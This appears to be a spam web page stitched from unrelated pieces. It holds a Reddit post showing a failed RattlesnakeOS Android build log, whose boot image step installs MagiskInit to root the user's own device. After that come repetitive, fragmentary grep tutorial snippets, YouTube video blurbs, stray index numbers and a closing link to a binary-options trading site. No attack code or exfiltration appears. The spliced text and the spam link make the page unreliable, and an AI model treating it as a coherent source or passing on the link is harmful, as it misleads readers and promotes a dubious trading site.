test/vts/testcases/host/shell/Android.mk ... [ 93% 411/439] including test/vts/testcases/host/shell_binary_crash_test/Android.mk ... [ 93% 412/439] including test/vts/testcases/host/verify_acpio/Android.mk ... [ 94% 413/439] including test/vts/testcases/host/verify_boot_headeAndroid.mk ... [ 94% 414/439] including test/vts/testcases/host/verify_dtbo/Android.mk ... [ 94% 415/439] including test/vts/testcases/system/device_health/Android.mk ... [ 94% 416/439] including test/vts/testcases/system/libc/Android.mk ... [ 94% 417/439] including test/vts/testcases/target/hal_lights/Android.mk ... [ 95% 418/439] including test/vts/testcases/target/hal_poweAndroid.mk ... [ 95% 419/439] including test/vts/testcases/vts_selftest/manual_tests/flaky_hidl_test/Android.mk ... [ 95% 420/439] including test/vts/testcases/vts_selftest/manual_tests/flaky_test/Android.mk ... [ 95% 421/439] including test/vts/testcases/vts_selftest/manual_tests/shell_performance/Android.mk ... [ 96% 422/439] including test/vts/testcases/vts_selftest/manual_tests/zero_testcase_binary_test/Android.mk ... [ 96% 423/439] including test/vts/testcases/vts_selftest/test_framework/base_test/Android.mk ... [ 96% 424/439] including test/vts/testcases/vts_selftest/test_framework/python_virtualenv_preparer_test/part0/Android.mk ... [ 96% 425/439] including test/vts/testcases/vts_selftest/test_framework/python_virtualenv_preparer_test/part1/Android.mk ... [ 97% 426/439] including test/vts/testcases/vts_selftest/test_framework/python_virtualenv_preparer_test/part2/Android.mk ... [ 97% 427/439] including test/vts/tools/vts-tradefed/Android.mk ... [ 97% 428/439] including test/vts/utils/python/archive/Android.mk ... [ 97% 429/439] including test/vts/utils/python/coverage/Android.mk ... [ 97% 430/439] including tools/loganalysis/Android.mk ... [ 98% 431/439] including tools/test/connectivity/Android.mk ... [ 98% 432/439] including tools/test/graphicsbenchmark/Android.mk ... [ 98% 433/439] including tools/tradefederation/contrib/build/Android.mk ... [ 98% 434/439] including tools/tradefederation/contrib/tests/build/Android.mk ... [ 99% 435/439] including tools/tradefederation/core/Android.mk ... [ 99% 436/439] including vendoandroid-prepare-vendoAndroid.mk ... [ 99% 437/439] including vendogoogle_devices/marlin/Android.mk ... [ 99% 438/439] finishing build rules ... platform_testing/build/tasks/tests/instrumentation_test_list.mk: warning: continuous_instrumentation_tests: Unknown installed file for module 'NexusLauncherOutOfProcTests' platform_testing/build/tasks/tests/instrumentation_test_list.mk: warning: continuous_instrumentation_tests: Unknown installed file for module 'NexusLauncherDebug' platform_testing/build/tasks/tests/instrumentation_test_list.mk: warning: continuous_instrumentation_tests: Unknown installed file for module 'NexusLauncherTests' platform_testing/build/tasks/tests/platform_test_list.mk: warning: platform_tests: Unknown installed file for module 'CalendarTests' platform_testing/build/tasks/tests/platform_test_list.mk: warning: platform_tests: Unknown installed file for module 'LauncherRotationStressTest' platform_testing/build/tasks/tests/platform_test_list.mk: warning: platform_tests: Unknown installed file for module 'PlatformScenarioTests' [100% 439/439] writing build rules ... No need to regenerate ninja file Starting ninja... [ 18% 440/2441] //development/build:android_stubs_current for turbine [common] [ 18% 441/2441] //development/build:android_stubs_current for javac [common] [ 18% 442/2441] //development/build:android_test_stubs_current for turbine [common] [ 18% 443/2441] //development/build:android_test_stubs_current for javac [common] [ 18% 444/2441] Copy: out/target/common/obj/JAVA_LIBRARIES/android_stubs_current_intermediates/classes-header.jar [ 18% 445/2441] //development/build:android_system_stubs_current for turbine [common] [ 18% 446/2441] //development/build:android_system_stubs_current for javac [common] [ 18% 447/2441] Copy: out/target/common/obj/JAVA_LIBRARIES/android_system_stubs_current_intermediates/classes-header.jar [ 18% 448/2441] Target boot image from recovery: out/target/product/marlin/boot.img FAILED: out/target/product/marlin/boot.img /bin/bash -c "(mkdir -p out/target/product/marlin/recovery ) && (mkdir -p out/target/product/marlin/recovery/root/sdcard out/target/product/marlin/recovery/root/tmp ) && (rsync -a --exclude=sdcard --exclude=/root/sepolicy --exclude=/root/plat_file_contexts --exclude=/root/vendor_file_contexts --exclude=/root/plat_property_contexts --exclude=/root/vendor_property_contexts --exclude=/root/odm_file_contexts --exclude=/root/odm_property_contexts --exclude=/root/product_file_contexts --exclude=/root/product_property_contexts --exclude=cache out/target/product/marlin/root out/target/product/marlin/recovery ) && (mkdir -p out/target/product/marlin/recovery/root/.backup ) && (cp -n out/target/product/marlin/recovery/root/system/bin/init out/target/product/marlin/recovery/root/.backup/init ) && (rm -f out/target/product/marlin/recovery/root/init ) && (cp ./magisk-latest/arm/magiskinit64 out/target/product/marlin/recovery/root/init ) && (echo \"KEEPFORCEENCRYPT=true\" > out/target/product/marlin/recovery/root/.backup/.magisk ) && (echo \"KEEPVERITY=true\" >> out/target/product/marlin/recovery/root/.backup/.magisk ) && (echo \"RECOVERYMODE=false\" >> out/target/product/marlin/recovery/root/.backup/.magisk ) && (./magisk-latest/x86/magiskboot hexpatch out/target/product/marlin/kernel 736B69705F696E697472616D6673 77616E745F696E697472616D6673 ) && (echo \"make out/target/product/marlin/boot.img: boot/recovery init binary has been replaced with MagiskInit\" ) && (find out/target/product/marlin/recovery/root -maxdepth 1 -name 'init.rc' -type f -not -name \"init.recovery..rc\" | xargs rm -f ) && (cp -f bootable/recovery/etc/init.rc out/target/product/marlin/recovery/root/ ) && (cp out/target/product/marlin/root/init.recovery..rc out/target/product/marlin/recovery/root/ 2> /dev/null || true ) && (mkdir -p out/target/product/marlin/recovery/root/res ) && (rm -rf out/target/product/marlin/recovery/root/res/ ) && (cp -rf bootable/recovery/res-xxxhdpi/* out/target/product/marlin/recovery/root/res ) && (cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates/installing_text.png out/target/product/marlin/recovery/root/res/images/ && cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates//installing_security_text.png out/target/product/marlin/recovery/root/res/images/ && cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates//erasing_text.png out/target/product/marlin/recovery/root/res/images/ && cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates//error_text.png out/target/product/marlin/recovery/root/res/images/ && cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates//no_command_text.png out/target/product/marlin/recovery/root/res/images/ && cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates//cancel_wipe_data_text.png out/target/product/marlin/recovery/root/res/images/ && cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates//factory_data_reset_text.png out/target/product/marlin/recovery/root/res/images/ && cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates//try_again_text.png out/target/product/marlin/recovery/root/res/images/ && cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates//wipe_data_confirmation_text.png out/target/product/marlin/recovery/root/res/images/ && cp -rf out/target/product/marlin/obj/PACKAGING/recovery_text_res_intermediates//wipe_data_menu_header_text.png out/target/product/marlin/recovery/root/res/images/ && true ) && (cp -f bootable/recovery/fonts/18x32.png out/target/product/marlin/recovery/root/res/images/font.png ) && (cp -f device/google/marlin/fstab.common out/target/product/marlin/recovery/root/system/etc/recovery.fstab ) && (cp -f device/google/marlin/recovery.wipe.common out/target/product/marlin/recovery/root/system/etc/recovery.wipe ) && (mkdir -p out/target/product/marlin/recovery/root/system/etc/security ) && (cp out/target/product/marlin/obj/PACKAGING/ota_keys_intermediates/otacerts.zip out/target/product/marlin/recovery/root/system/etc/security/otacerts.zip ) && (ln -sf prop.default out/target/product/marlin/recovery/root/default.prop ) && (out/host/linux-x86/bin/mkbootfs -d out/target/product/marlin/system out/target/product/marlin/recovery/root | out/host/linux-x86/bin/minigzip > out/target/product/marlin/ramdisk-recovery.img ) && (out/host/linux-x86/bin/mkbootimg --kernel out/target/product/marlin/kernel --ramdisk out/target/product/marlin/ramdisk-recovery.img --cmdline \"console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 androidboot.hardware=marlin user_debug=31 ehci-hcd.park=3 lpm_levels.sleep_disabled=1 [email protected] loop.max_part=7 buildvariant=user veritykeyid=id:`openssl x509 -in build/target/product/security/verity.x509.pem -text | grep keyid | sed 's/://g' | tr -d '[:space:]' | tr '[:upper:]' '[:lower:]' | sed 's/keyid//g'`\" --base 0x80000000 --pagesize 4096 --os_version 10 --os_patch_level 2019-10-06 --output out/target/product/marlin/boot.img --id > out/target/product/marlin/recovery.id ) && (out/host/linux-x86/bin/boot_signer /boot out/target/product/marlin/boot.img build/target/product/security/verity.pk8 build/target/product/security/verity.x509.pem out/target/product/marlin/boot.img ) && (size=\$(for i in out/target/product/marlin/boot.img; do stat -c \"%s\" \"\$i\" | tr -d '\n'; echo +; done; echo 0); total=\$(( \$( echo \"\$size\" ) )); printname=\$(echo -n \" out/target/product/marlin/boot.img\" | tr \" \" +); maxsize=\$(( 0x02000000-0)); if [ \"\$total\" -gt \"\$maxsize\" ]; then echo \"error: \$printname too large (\$total > \$maxsize)\"; false; elif [ \"\$total\" -gt \$((maxsize - 32768)) ]; then echo \"WARNING: \$printname approaching size limit (\$total now; limit \$maxsize)\"; fi )" [ 18% 449/2441] //prebuilts/sdk/current/extras/app-toolkit:android-arch-lifecycle-runtime turbine [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 450/2441] //prebuilts/sdk/current/extras/app-toolkit:android-arch-core-runtime turbine [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 451/2441] //prebuilts/sdk/current/extras/app-toolkit:android-arch-lifecycle-viewmodel turbine [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 452/2441] //frameworks/base/packages/SystemUI/plugin_core:PluginCoreLib turbine [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 453/2441] //frameworks/base/packages/SettingsLib/HelpUtils:SettingsLibHelpUtils turbine [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 454/2441] //prebuilts/sdk/current/extras/app-toolkit:android-arch-core-runtime javac [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 455/2441] //prebuilts/sdk/current/extras/app-toolkit:android-arch-lifecycle-runtime javac [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 456/2441] //frameworks/base/packages/SystemUI/plugin_core:PluginCoreLib javac [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 457/2441] //packages/apps/OneTimeInitializer:OneTimeInitializer javac [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 458/2441] Target Java: out/target/common/obj/APPS/ExtShared_intermediates/classes-full-debug.jar Picked up _JAVA_OPTIONS: -XX:-UsePerfData Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 459/2441] //packages/apps/HTMLViewer:HTMLViewer javac [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 460/2441] Target Java: out/target/common/obj/APPS/InputDevices_intermediates/classes-full-debug.jar Picked up _JAVA_OPTIONS: -XX:-UsePerfData Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 461/2441] //packages/apps/Music:Music javac [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 462/2441] //packages/screensavers/PhotoTable:PhotoTable javac [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData [ 18% 463/2441] //frameworks/base/packages/EasterEgg:EasterEgg kotlinc [common] Picked up _JAVA_OPTIONS: -XX:-UsePerfData ninja: build stopped: subcommand failed. 08:41:35 ninja failed with: exit status 1

failed to build some targets (01:12 (mm:ss))

2020-02-20 08:41:35: Failure! Retrying (make

2020-02-20 08:41:39: Failed too many times! (make

2020-02-20 08:41:39: Running aws_logging

Filesystem Size Used Avail Use% Mounted on udev 16G 0 16G 0% /dev tmpfs 3.1G 764K 3.1G 1% /run /dev/nvme0n1p1 194G 135G 60G 70% / tmpfs 16G 0 16G 0% /dev/shm tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 16G 0 16G 0% /sys/fs/cgroup /dev/loop0 91M 91M 0 100% /snap/core/6350 /dev/loop1 18M 18M 0 100% /snap/amazon-ssm-agent/930 tmpfs 20M 56K 20M 1% /home/ubuntu/rattlesnake-os/keys 123G /home/ubuntu/rattlesnake-os 123G total 08:41:53 up 1:41, 0 users, load average: 3.72, 20.09, 26.92 Completed 256.0 KiB/22.6 MiB (1.2 MiB/s) with 1 file(s) remaining Completed 512.0 KiB/22.6 MiB (2.3 MiB/s) with 1 file(s) remaining Completed 768.0 KiB/22.6 MiB (3.2 MiB/s) with 1 file(s) remaining Completed 1.0 MiB/22.6 MiB (4.3 MiB/s) with 1 file(s) remaining Completed 1.2 MiB/22.6 MiB (5.4 MiB/s) with 1 file(s) remaining Completed 1.5 MiB/22.6 MiB (6.2 MiB/s) with 1 file(s) remaining Completed 1.8 MiB/22.6 MiB (7.2 MiB/s) with 1 file(s) remaining Completed 2.0 MiB/22.6 MiB (8.2 MiB/s) with 1 file(s) remaining Completed 2.2 MiB/22.6 MiB (9.2 MiB/s) with 1 file(s) remaining Completed 2.5 MiB/22.6 MiB (10.2 MiB/s) with 1 file(s) remaining Completed 2.8 MiB/22.6 MiB (10.9 MiB/s) with 1 file(s) remaining Completed 3.0 MiB/22.6 MiB (11.8 MiB/s) with 1 file(s) remaining Completed 3.2 MiB/22.6 MiB (12.8 MiB/s) with 1 file(s) remaining Completed 3.5 MiB/22.6 MiB (13.7 MiB/s) with 1 file(s) remaining Completed 3.8 MiB/22.6 MiB (14.7 MiB/s) with 1 file(s) remaining Completed 4.0 MiB/22.6 MiB (15.6 MiB/s) with 1 file(s) remaining Completed 4.2 MiB/22.6 MiB (16.5 MiB/s) with 1 file(s) remaining Completed 4.5 MiB/22.6 MiB (17.5 MiB/s) with 1 file(s) remaining Completed 4.8 MiB/22.6 MiB (18.0 MiB/s) with 1 file(s) remaining Completed 5.0 MiB/22.6 MiB (18.8 MiB/s) with 1 file(s) remaining Completed 5.2 MiB/22.6 MiB (19.7 MiB/s) with 1 file(s) remaining Completed 5.5 MiB/22.6 MiB (20.6 MiB/s) with 1 file(s) remaining Completed 5.8 MiB/22.6 MiB (21.5 MiB/s) with 1 file(s) remaining Completed 6.0 MiB/22.6 MiB (22.4 MiB/s) with 1 file(s) remaining Completed 6.2 MiB/22.6 MiB (23.2 MiB/s) with 1 file(s) remaining Completed 6.5 MiB/22.6 MiB (23.6 MiB/s) with 1 file(s) remaining Completed 6.8 MiB/22.6 MiB (24.4 MiB/s) with 1 file(s) remaining Completed 7.0 MiB/22.6 MiB (25.3 MiB/s) with 1 file(s) remaining Completed 7.2 MiB/22.6 MiB (26.1 MiB/s) with 1 file(s) remaining Completed 7.5 MiB/22.6 MiB (26.9 MiB/s) with 1 file(s) remaining Completed 7.8 MiB/22.6 MiB (27.7 MiB/s) with 1 file(s) remaining Completed 8.0 MiB/22.6 MiB (28.5 MiB/s) with 1 file(s) remaining Completed 8.2 MiB/22.6 MiB (29.3 MiB/s) with 1 file(s) remaining Completed 8.5 MiB/22.6 MiB (30.1 MiB/s) with 1 file(s) remaining Completed 8.8 MiB/22.6 MiB (30.9 MiB/s) with 1 file(s) remaining Completed 9.0 MiB/22.6 MiB (31.8 MiB/s) with 1 file(s) remaining Completed 9.2 MiB/22.6 MiB (32.0 MiB/s) with 1 file(s) remaining Completed 9.5 MiB/22.6 MiB (32.7 MiB/s) with 1 file(s) remaining Completed 9.8 MiB/22.6 MiB (33.5 MiB/s) with 1 file(s) remaining Completed 10.0 MiB/22.6 MiB (34.2 MiB/s) with 1 file(s) remaining Completed 10.2 MiB/22.6 MiB (35.0 MiB/s) with 1 file(s) remaining Completed 10.5 MiB/22.6 MiB (35.7 MiB/s) with 1 file(s) remaining Completed 10.8 MiB/22.6 MiB (36.5 MiB/s) with 1 file(s) remaining Completed 11.0 MiB/22.6 MiB (36.5 MiB/s) with 1 file(s) remaining Completed 11.2 MiB/22.6 MiB (37.2 MiB/s) with 1 file(s) remaining Completed 11.5 MiB/22.6 MiB (37.9 MiB/s) with 1 file(s) remaining Completed 11.8 MiB/22.6 MiB (38.6 MiB/s) with 1 file(s) remaining Completed 12.0 MiB/22.6 MiB (39.2 MiB/s) with 1 file(s) remaining Completed 12.2 MiB/22.6 MiB (40.0 MiB/s) with 1 file(s) remaining Completed 12.5 MiB/22.6 MiB (38.7 MiB/s) with 1 file(s) remaining Completed 12.8 MiB/22.6 MiB (39.4 MiB/s) with 1 file(s) remaining Completed 13.0 MiB/22.6 MiB (40.1 MiB/s) with 1 file(s) remaining Completed 13.2 MiB/22.6 MiB (40.8 MiB/s) with 1 file(s) remaining Completed 13.5 MiB/22.6 MiB (41.5 MiB/s) with 1 file(s) remaining Completed 13.8 MiB/22.6 MiB (41.6 MiB/s) with 1 file(s) remaining Completed 14.0 MiB/22.6 MiB (42.2 MiB/s) with 1 file(s) remaining Completed 14.2 MiB/22.6 MiB (42.9 MiB/s) with 1 file(s) remaining Completed 14.5 MiB/22.6 MiB (43.6 MiB/s) with 1 file(s) remaining Completed 14.6 MiB/22.6 MiB (41.1 MiB/s) with 1 file(s) remaining Completed 14.9 MiB/22.6 MiB (33.0 MiB/s) with 1 file(s) remaining Completed 15.1 MiB/22.6 MiB (33.5 MiB/s) with 1 file(s) remaining Completed 15.4 MiB/22.6 MiB (33.2 MiB/s) with 1 file(s) remaining Completed 15.6 MiB/22.6 MiB (33.7 MiB/s) with 1 file(s) remaining Completed 15.9 MiB/22.6 MiB (34.3 MiB/s) with 1 file(s) remaining Completed 16.1 MiB/22.6 MiB (34.0 MiB/s) with 1 file(s) remaining Completed 16.4 MiB/22.6 MiB (34.5 MiB/s) with 1 file(s) remaining Completed 16.6 MiB/22.6 MiB (35.0 MiB/s) with 1 file(s) remaining Completed 16.9 MiB/22.6 MiB (35.5 MiB/s) with 1 file(s) remaining Completed 17.1 MiB/22.6 MiB (35.3 MiB/s) with 1 file(s) remaining Completed 17.4 MiB/22.6 MiB (35.8 MiB/s) with 1 file(s) remaining Completed 17.6 MiB/22.6 MiB (36.3 MiB/s) with 1 file(s) remaining Completed 17.9 MiB/22.6 MiB (36.7 MiB/s) with 1 file(s) remaining Completed 18.1 MiB/22.6 MiB (37.2 MiB/s) with 1 file(s) remaining Completed 18.4 MiB/22.6 MiB (37.7 MiB/s) with 1 file(s) remaining Completed 18.6 MiB/22.6 MiB (38.1 MiB/s) with 1 file(s) remaining Completed 18.9 MiB/22.6 MiB (38.1 MiB/s) with 1 file(s) remaining Completed 19.1 MiB/22.6 MiB (38.5 MiB/s) with 1 file(s) remaining Completed 19.4 MiB/22.6 MiB (38.9 MiB/s) with 1 file(s) remaining Completed 19.6 MiB/22.6 MiB (39.3 MiB/s) with 1 file(s) remaining Completed 19.9 MiB/22.6 MiB (39.8 MiB/s) with 1 file(s) remaining Completed 20.1 MiB/22.6 MiB (40.2 MiB/s) with 1 file(s) remaining Completed 20.4 MiB/22.6 MiB (40.6 MiB/s) with 1 file(s) remaining Completed 20.6 MiB/22.6 MiB (39.7 MiB/s) with 1 file(s) remaining Completed 20.9 MiB/22.6 MiB (40.1 MiB/s) with 1 file(s) remaining Completed 21.1 MiB/22.6 MiB (40.5 MiB/s) with 1 file(s) remaining Completed 21.4 MiB/22.6 MiB (40.6 MiB/s) with 1 file(s) remaining Completed 21.6 MiB/22.6 MiB (41.0 MiB/s) with 1 file(s) remaining Completed 21.9 MiB/22.6 MiB (41.4 MiB/s) with 1 file(s) remaining Completed 22.1 MiB/22.6 MiB (41.8 MiB/s) with 1 file(s) remaining Completed 22.4 MiB/22.6 MiB (42.2 MiB/s) with 1 file(s) remaining Completed 22.6 MiB/22.6 MiB (42.6 MiB/s) with 1 file(s) remaining

upload: ../../../valog/cloud-init-output.log to s3://rattlesnakeos-marlin-2xahh8bwsn-logs/marlin/1582188113

2020-02-20 08:41:55: Running aws_notify

submitted by anon1167442 to RattlesnakeOS [link] [comments]

Linux/Mac Terminal Tutorial: The Grep Command - Search ... Unix Filters - 2 (Extended grep - egrep ; grep - E ; grep -e ; grep -f ) 01.06 Grep and Find on the Linux Command Line Linux Command Line Tutorial For Beginners 37 - grep ... Linux: GREP Command tutorial - YouTube Mastering Grep a 1 hour webinar Unix & Linux: Empty a file without grep subsequently ...

grep stands for Globally Search For Regular Expression and Print out.It is a command line tool used in UNIX and Linux systems to search a specified pattern in a file or group of files. grep comes with a lot of options which allow us to perform various search-related actions on files. In this article, we'll look at how to use grep with the options available as well as basic regular expressions ... Apparently, grep considers the file binary, ... the -I/--binary-files=without-match options are given; and the binary-ness is due to null bytes. However, that's not the case with the example input. The example file is treated as binary because it doesn't fit the current locale (probably some UTF locale), not because it has null bytes. Otherwise: % LC_ALL=C grep 8 test-file x J @` y dIf ( P 6u ... -U, --binary Treat the file(s) as binary. By default, under MS-DOS and MS-Windows, grep guesses the file type by looking at the contents of the first 32KB read from the file. If grep decides the file is a text file, it strips the CR characters from the original file contents (to make regular expressions with ^ and $ work correctly). There are three options, that you can use. -I is to exclude binary files in grep. Other are for line numbers and file names. grep -I -n -H -I -- process a binary file as if it did not contain matching data; -n -- prefix each line of output with the 1-based line number within its input file -H -- print the file name for each match The file /etc/magic or /usr/share/misc/magic has a list of sequences that the command file uses for determining the file type. Note that binary may just be a fallback solution. Sometimes files with strange encoding are considered binary too. grep on Linux has some options to handle binary files like --binary-files or -U / --binary By default, under MS-DOS and MS- Windows, grep guesses whether a file is text or binary as described for the --binary-files option. If grep decides the file is a text file, it strips the CR characters from the original file contents (to make regular expressions with ^ and $ work correctly). -U, --binary: Treat the file(s) as binary. By default, under MS-DOS and MS-Windows, grep guesses the file type by looking at the contents of the first 32KB read from the file. If grep decides the file is a text file, it strips the CR characters from the original file contents (to make regular expressions with ^ and $ work correctly).

[index] [15466] [6253] [14011] [28304] [20390] [18949] [21223] [29610] [17246] [28008]

Linux/Mac Terminal Tutorial: The Grep Command - Search ...

We hold weekly webinars in all things Linux, this week we took a look at GNU #grep on CentOS #Linux 7. Giving a great start onto some of the options in grep and the use of regular expressions. Unix & Linux: Empty a file without grep subsequently treating it like a binary file Helpful? Please support me on Patreon: https://www.patreon.com/roelvandep... grep, egrep, fgrep - print lines matching a pattern use: grep [OPTIONS] PATTERN [FILE...] grep [OPTIONS] [-e PATTERN -f FILE] [FILE...] Description: grep s... How to use the Linux grep command to search files and find text strings. MORE LINUX COMMANDS Grep https://youtu.be/2-3i42XXzek Find https://youtu.be/J-ei... https://www.patreon.com/cybering Learn how to grep for contents of files and use find to locate files matching a name! 00:20 grep 04:14 find https://cybering.cc. In this Linux/Mac terminal tutorial, we will be learning how to use the grep command. The grep command allows us to search files and directories for patterns... grep is a important command in linux command line. grep is used to search the pattern from input file (or) PIPE. In this video we have discussed how to use grep with more examples with different ...

https://binaryoptiontrade.swithinacspydun.tk